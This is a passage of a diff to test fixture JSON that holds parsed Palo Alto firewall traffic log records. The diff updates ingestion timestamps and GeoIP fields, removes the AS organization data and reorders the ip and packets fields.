"bytes": 11136, - "ip": "175.16.199.1", - "packets": 16 + "packets": 16, + "ip": "175.16.199.1" }, "rule": { "name": "new_outbound_from_trust" @@ -8183,7 +7938,7 @@ }, "event": { "duration": 8000000000, - "ingested": "2021-12-09T13:44:05.031694700Z", + "ingested": "2021-12-14T14:51:01.287213833Z", "original": "Nov 30 16:09:45 PA-220 1,2018/11/30 16:09:45,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:45,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,xuntrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:45,24234,1,52483,443,16050,443,0x400053,tcp,allow,14732,3596,11136,31,2018/11/30 16:09:19,8,computer-and-internet-info,0,32091160,0x0,192.168.0.0-192.168.255.255,Asia Pacific Region,0,15,16,tcp-fin,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "created": "2018-11-30T16:09:45.000-05:00", "timezone": "America/New_York", @@ -8211,26 +7966,21 @@ }, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 0, "bytes": 588, - "ip": "175.16.199.1", - "packets": 6 + "packets": 6, + "ip": "175.16.199.1" }, "rule": { "name": "new_outbound_from_trust" @@ -8341,7 +8091,7 @@ }, "event": { "duration": 0, - "ingested": "2021-12-09T13:44:05.031700100Z", + "ingested": "2021-12-14T14:51:01.287214161Z", "original": "Nov 30 16:09:46 PA-220 1,2018/11/30 16:09:46,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:46,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ping,vsys1,,,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:46,24390,6,0,0,0,0,0x500019,icmp,allow,1176,588,588,12,2018/11/30 16:09:31,0,any,0,32091161,0x0,192.168.0.0-192.168.255.255,United States,0,6,6,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "created": "2018-11-30T16:09:46.000-05:00", "timezone": "America/New_York", @@ -8369,26 +8119,21 @@ }, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 53, "bytes": 144, - "ip": "175.16.199.1", - "packets": 1 + "packets": 1, + "ip": "175.16.199.1" }, "rule": { "name": "new_outbound_from_trust" @@ -8510,7 +8255,7 @@ }, "event": { "duration": 0, - "ingested": "2021-12-09T13:44:05.031705300Z", + "ingested": "2021-12-14T14:51:01.287214659Z", "original": "Nov 30 16:09:46 PA-220 1,2018/11/30 16:09:46,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:46,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:46,24093,1,38663,53,61722,53,0x400019,udp,allow,228,84,144,2,2018/11/30 16:09:13,0,any,0,32091162,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "created": "2018-11-30T16:09:46.000-05:00", "timezone": "America/New_York", @@ -8538,26 +8283,21 @@ }, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 53, "bytes": 206, - "ip": "175.16.199.1", - "packets": 1 + "packets": 1, + "ip": "175.16.199.1" }, "rule": { "name": "new_outbound_from_trust" @@ -8679,7 +8419,7 @@ }, "event": { "duration": 0, - "ingested": "2021-12-09T13:44:05.031708500Z", + "ingested": "2021-12-14T14:51:01.287214977Z", "original": "Nov 30 16:09:46 PA-220 1,2018/11/30 16:09:46,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:46,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:46,24117,1,50443,53,14247,53,0x400019,udp,allow,337,131,206,2,2018/11/30 16:09:13,0,any,0,32091163,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "created": "2018-11-30T16:09:46.000-05:00", "timezone": "America/New_York", @@ -8707,26 +8447,21 @@ }, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 53, "bytes": 206, - "ip": "175.16.199.1", - "packets": 1 + "packets": 1, + "ip": "175.16.199.1" }, "rule": { "name": "new_outbound_from_trust" @@ -8848,7 +8583,7 @@ }, "event": { "duration": 0, - "ingested": "2021-12-09T13:44:05.031712800Z", + "ingested": "2021-12-14T14:51:01.287215298Z", "original": "Nov 30 16:09:46 PA-220 1,2018/11/30 16:09:46,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:46,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:46,24142,1,54215,53,33580,53,0x400019,udp,allow,337,131,206,2,2018/11/30 16:09:13,0,any,0,32091164,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "created": "2018-11-30T16:09:46.000-05:00", "timezone": "America/New_York", @@ -8876,26 +8611,21 @@ }, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 53, "bytes": 169, - "ip": "175.16.199.1", - "packets": 1 + "packets": 1, + "ip": "175.16.199.1" }, "rule": { "name": "new_outbound_from_trust" @@ -9017,7 +8747,7 @@ }, "event": { "duration": 0, - "ingested": "2021-12-09T13:44:05.031717800Z", + "ingested": "2021-12-14T14:51:01.287215617Z", "original": "Nov 30 16:09:46 PA-220 1,2018/11/30 16:09:46,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:46,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:46,24195,1,35827,53,13498,53,0x400019,udp,allow,252,83,169,2,2018/11/30 16:09:13,0,any,0,32091165,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "created": "2018-11-30T16:09:46.000-05:00", "timezone": "America/New_York", @@ -9045,26 +8775,21 @@ }, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 53, "bytes": 132, - "ip": "175.16.199.1", - "packets": 1 + "packets": 1, + "ip": "175.16.199.1" }, "rule": { "name": "new_outbound_from_trust" @@ -9186,7 +8911,7 @@ }, "event": { "duration": 0, - "ingested": "2021-12-09T13:44:05.031722600Z", + "ingested": "2021-12-14T14:51:01.287216016Z", "original": "Nov 30 16:09:46 PA-220 1,2018/11/30 16:09:46,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:46,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:46,24124,1,60609,53,20365,53,0x400019,udp,allow,232,100,132,2,2018/11/30 16:09:13,0,any,0,32091166,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "created": "2018-11-30T16:09:46.000-05:00", "timezone": "America/New_York", @@ -9214,26 +8939,21 @@ }, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 53, "bytes": 127, - "ip": "175.16.199.1", - "packets": 1 + "packets": 1, + "ip": "175.16.199.1" }, "rule": { "name": "new_outbound_from_trust" @@ -9355,7 +9075,7 @@ }, "event": { "duration": 0, - "ingested": "2021-12-09T13:44:05.031726300Z", + "ingested": "2021-12-14T14:51:01.287216337Z", "original": "Nov 30 16:09:46 PA-220 1,2018/11/30 16:09:46,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:46,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:46,24153,1,3248,53,61464,53,0x400019,udp,allow,206,79,127,2,2018/11/30 16:09:13,0,any,0,32091167,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "created": "2018-11-30T16:09:46.000-05:00", "timezone": "America/New_York", @@ -9383,26 +9103,21 @@ }, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 53, "bytes": 105, - "ip": "175.16.199.1", - "packets": 1 + "packets": 1, + "ip": "175.16.199.1" }, "rule": { "name": "new_outbound_from_trust" @@ -9524,7 +9239,7 @@ }, "event": { "duration": 0, - "ingested": "2021-12-09T13:44:05.031730500Z", + "ingested": "2021-12-14T14:51:01.287216699Z", "original": "Nov 30 16:09:46 PA-220 1,2018/11/30 16:09:46,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:46,192.168.15.196,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:46,24122,1,49284,53,42877,53,0x400019,udp,allow,194,89,105,2,2018/11/30 16:09:13,0,any,0,32091168,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "created": "2018-11-30T16:09:46.000-05:00", "timezone": "America/New_York", @@ -9552,26 +9267,21 @@ }, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 53, "bytes": 172, - "ip": "175.16.199.1", - "packets": 1 + "packets": 1, + "ip": "175.16.199.1" }, "rule": { "name": "new_outbound_from_trust" @@ -9693,7 +9403,7 @@ }, "event": { "duration": 0, - "ingested": "2021-12-09T13:44:05.031735800Z", + "ingested": "2021-12-14T14:51:01.287217025Z", "original": "Nov 30 16:09:46 PA-220 1,2018/11/30 16:09:46,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:46,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:46,24171,1,57732,53,5918,53,0x400019,udp,allow,269,97,172,2,2018/11/30 16:09:13,0,any,0,32091169,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "created": "2018-11-30T16:09:46.000-05:00", "timezone": "America/New_York", @@ -9721,26 +9431,21 @@ }, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 53, "bytes": 134, - "ip": "175.16.199.1", - "packets": 1 + "packets": 1, + "ip": "175.16.199.1" }, "rule": { "name": "new_outbound_from_trust" @@ -9862,7 +9567,7 @@ }, "event": { "duration": 0, - "ingested": "2021-12-09T13:44:05.031739800Z", + "ingested": "2021-12-14T14:51:01.287217338Z", "original": "Nov 30 16:09:46 PA-220 1,2018/11/30 16:09:46,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:46,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:46,24069,1,49195,53,28944,53,0x400019,udp,allow,212,78,134,2,2018/11/30 16:09:13,0,any,0,32091170,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "created": "2018-11-30T16:09:46.000-05:00", "timezone": "America/New_York", @@ -9890,26 +9595,21 @@ }, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 53, "bytes": 179, - "ip": "175.16.199.1", - "packets": 1 + "packets": 1, + "ip": "175.16.199.1" }, "rule": { "name": "new_outbound_from_trust" @@ -10031,7 +9731,7 @@ }, "event": { "duration": 0, - "ingested": "2021-12-09T13:44:05.031746900Z", + "ingested": "2021-12-14T14:51:01.287217735Z", "original": "Nov 30 16:09:46 PA-220 1,2018/11/30 16:09:46,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:46,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:46,24282,1,17266,53,13415,53,0x400019,udp,allow,252,73,179,2,2018/11/30 16:09:13,0,any,0,32091171,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "created": "2018-11-30T16:09:46.000-05:00", "timezone": "America/New_York", @@ -10059,26 +9759,21 @@ }, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 53, "bytes": 218, - "ip": "175.16.199.1", - "packets": 1 + "packets": 1, + "ip": "175.16.199.1" }, "rule": { "name": "new_outbound_from_trust" @@ -10200,7 +9895,7 @@ }, "event": { "duration": 0, - "ingested": "2021-12-09T13:44:05.031754Z", + "ingested": "2021-12-14T14:51:01.287218059Z", "original": "Nov 30 16:09:46 PA-220 1,2018/11/30 16:09:46,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:46,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:46,24218,1,48631,53,2489,53,0x400019,udp,allow,308,90,218,2,2018/11/30 16:09:13,0,any,0,32091172,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "created": "2018-11-30T16:09:46.000-05:00", "timezone": "America/New_York", @@ -10228,26 +9923,21 @@ }, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 53, "bytes": 172, - "ip": "175.16.199.1", - "packets": 1 + "packets": 1, + "ip": "175.16.199.1" }, "rule": { "name": "new_outbound_from_trust" @@ -10369,7 +10059,7 @@ }, "event": { "duration": 0, - "ingested": "2021-12-09T13:44:05.031759600Z", + "ingested": "2021-12-14T14:51:01.287218378Z", "original": "Nov 30 16:09:46 PA-220 1,2018/11/30 16:09:46,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:46,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:46,24200,1,58540,53,49328,53,0x400019,udp,allow,249,77,172,2,2018/11/30 16:09:13,0,any,0,32091173,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "created": "2018-11-30T16:09:46.000-05:00", "timezone": "America/New_York", @@ -10397,26 +10087,21 @@ }, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 53, "bytes": 305, - "ip": "175.16.199.1", - "packets": 1 + "packets": 1, + "ip": "175.16.199.1" }, "rule": { "name": "new_outbound_from_trust" @@ -10538,7 +10223,7 @@ }, "event": { "duration": 0, - "ingested": "2021-12-09T13:44:05.031765100Z", + "ingested": "2021-12-14T14:51:01.287218699Z", "original": "Nov 30 16:09:46 PA-220 1,2018/11/30 16:09:46,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:46,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:46,24224,1,42678,53,36036,53,0x400019,udp,allow,379,74,305,2,2018/11/30 16:09:13,0,any,0,32091174,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "created": "2018-11-30T16:09:46.000-05:00", "timezone": "America/New_York", @@ -10566,26 +10251,21 @@ }, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 53, "bytes": 527, - "ip": "175.16.199.1", - "packets": 1 + "packets": 1, + "ip": "175.16.199.1" }, "rule": { "name": "new_outbound_from_trust" @@ -10707,7 +10387,7 @@ }, "event": { "duration": 0, - "ingested": "2021-12-09T13:44:05.031770500Z", + "ingested": "2021-12-14T14:51:01.287219024Z", "original": "Nov 30 16:09:47 PA-220 1,2018/11/30 16:09:47,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:47,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:47,24240,1,16576,53,33744,53,0x400019,udp,allow,603,76,527,2,2018/11/30 16:09:14,0,any,0,32091175,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "created": "2018-11-30T16:09:47.000-05:00", "timezone": "America/New_York", @@ -10735,26 +10415,21 @@ }, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 53, "bytes": 153, - "ip": "175.16.199.1", - "packets": 1 + "packets": 1, + "ip": "175.16.199.1" }, "rule": { "name": "new_outbound_from_trust" @@ -10876,7 +10551,7 @@ }, "event": { "duration": 0, - "ingested": "2021-12-09T13:44:05.031775900Z", + "ingested": "2021-12-14T14:51:01.287219441Z", "original": "Nov 30 16:09:47 PA-220 1,2018/11/30 16:09:47,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:47,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:47,24183,1,39830,53,45809,53,0x400019,udp,allow,242,89,153,2,2018/11/30 16:09:14,0,any,0,32091176,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "created": "2018-11-30T16:09:47.000-05:00", "timezone": "America/New_York", @@ -10904,26 +10579,21 @@ }, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 53, "bytes": 169, - "ip": "175.16.199.1", - "packets": 1 + "packets": 1, + "ip": "175.16.199.1" }, "rule": { "name": "new_outbound_from_trust" @@ -11045,7 +10715,7 @@ }, "event": { "duration": 0, - "ingested": "2021-12-09T13:44:05.031781300Z", + "ingested": "2021-12-14T14:51:01.287241960Z", "original": "Nov 30 16:09:47 PA-220 1,2018/11/30 16:09:47,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:47,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:47,24211,1,6185,53,3675,53,0x400019,udp,allow,240,71,169,2,2018/11/30 16:09:14,0,any,0,32091177,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "created": "2018-11-30T16:09:47.000-05:00", "timezone": "America/New_York", @@ -11073,26 +10743,21 @@ }, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 53, "bytes": 128, - "ip": "175.16.199.1", - "packets": 1 + "packets": 1, + "ip": "175.16.199.1" }, "rule": { "name": "new_outbound_from_trust" @@ -11214,7 +10879,7 @@ }, "event": { "duration": 0, - "ingested": "2021-12-09T13:44:05.031786700Z", + "ingested": "2021-12-14T14:51:01.287242346Z", "original": "Nov 30 16:09:47 PA-220 1,2018/11/30 16:09:47,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:47,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:47,24253,1,8781,53,5787,53,0x400019,udp,allow,208,80,128,2,2018/11/30 16:09:14,0,any,0,32091178,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "created": "2018-11-30T16:09:47.000-05:00", "timezone": "America/New_York", @@ -11242,26 +10907,21 @@ }, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 53, "bytes": 181, - "ip": "175.16.199.1", - "packets": 1 + "packets": 1, + "ip": "175.16.199.1" }, "rule": { "name": "new_outbound_from_trust" @@ -11383,7 +11043,7 @@ }, "event": { "duration": 0, - "ingested": "2021-12-09T13:44:05.031792200Z", + "ingested": "2021-12-14T14:51:01.287242700Z", "original": "Nov 30 16:09:47 PA-220 1,2018/11/30 16:09:47,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:47,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:47,24221,1,16788,53,12342,53,0x400019,udp,allow,253,72,181,2,2018/11/30 16:09:14,0,any,0,32091179,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "created": "2018-11-30T16:09:47.000-05:00", "timezone": "America/New_York", @@ -11411,26 +11071,21 @@ }, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 53, "bytes": 121, - "ip": "175.16.199.1", - "packets": 1 + "packets": 1, + "ip": "175.16.199.1" }, "rule": { "name": "new_outbound_from_trust" @@ -11552,7 +11207,7 @@ }, "event": { "duration": 0, - "ingested": "2021-12-09T13:44:05.031797700Z", + "ingested": "2021-12-14T14:51:01.287243043Z", "original": "Nov 30 16:09:47 PA-220 1,2018/11/30 16:09:47,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:47,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:47,24310,1,45307,53,18729,53,0x400019,udp,allow,197,76,121,2,2018/11/30 16:09:14,0,any,0,32091180,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "created": "2018-11-30T16:09:47.000-05:00", "timezone": "America/New_York", @@ -11580,26 +11235,21 @@ }, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 80, "bytes": 1246, - "ip": "175.16.199.1", - "packets": 5 + "packets": 5, + "ip": "175.16.199.1" }, "rule": { "name": "new_outbound_from_trust" @@ -11721,7 +11371,7 @@ }, "event": { "duration": 0, - "ingested": "2021-12-09T13:44:05.031803200Z", + "ingested": "2021-12-14T14:51:01.287243452Z", "original": "Nov 30 16:09:47 PA-220 1,2018/11/30 16:09:47,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:47,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ocsp,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 